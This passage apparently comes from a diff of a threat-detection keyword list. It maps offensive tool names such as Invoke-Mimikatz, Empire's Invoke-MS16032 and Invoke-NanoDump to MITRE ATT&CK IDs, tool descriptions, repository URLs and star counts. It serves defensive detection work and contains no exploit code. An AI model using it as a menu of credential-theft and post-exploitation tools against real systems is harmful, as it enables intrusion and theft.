- T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*Invoke-MetaTwin*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","1","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" "*InvokeMeter.bat*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*Invoke-MFASweep*","offensive_tool_keyword","FMFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003","TA0006 - TA0009","N/A","N/A","Exploitation tools","https://github.com/dafthack/MFASweep","1","1","N/A","9","10","1033","152","2023-07-25T05:10:55Z","2020-09-22T16:25:03Z" -"*Invoke-Mimikatz*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Invoke-Mimikatz*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/g4uss47/Invoke-Mimikatz","1","1","N/A","10","1","23","6","2023-03-02T22:59:52Z","2020-09-22T16:47:19Z" -"*Invoke-Mimikatz*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-Mimikatz*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-Mimikatz*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/g4uss47/Invoke-Mimikatz","1","1","N/A","10","1","24","6","2023-03-02T22:59:52Z","2020-09-22T16:47:19Z" +"*Invoke-Mimikatz*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-Mimikatz.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-Mimikatz.ps1*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" -"*Invoke-Mimikatz.ps1*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/g4uss47/Invoke-Mimikatz","1","1","N/A","10","1","23","6","2023-03-02T22:59:52Z","2020-09-22T16:47:19Z" +"*Invoke-Mimikatz.ps1*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/g4uss47/Invoke-Mimikatz","1","1","N/A","10","1","24","6","2023-03-02T22:59:52Z","2020-09-22T16:47:19Z" "*Invoke-Mimikatz-old*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" -"*Invoke-MITM6*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-ModifiableProgramsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-MonitorCredSniper*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Invoke-MS16*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-MS16032*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16032.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-MS16032*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1126","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-MS16135*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-MS16135.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1120","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-NamedPipePermissionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-NanoDump*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-NanoDump*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-NetRipper*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1069","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-NetworkAdaptersCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-NetworkRelay*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-MITM6*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-ModifiableProgramsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-MonitorCredSniper*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-MS16*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-MS16032*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16032.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-MS16032*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1126","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-MS16135*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-MS16135.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1120","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-NamedPipePermissionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-NanoDump*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-NanoDump*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-NetRipper*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - 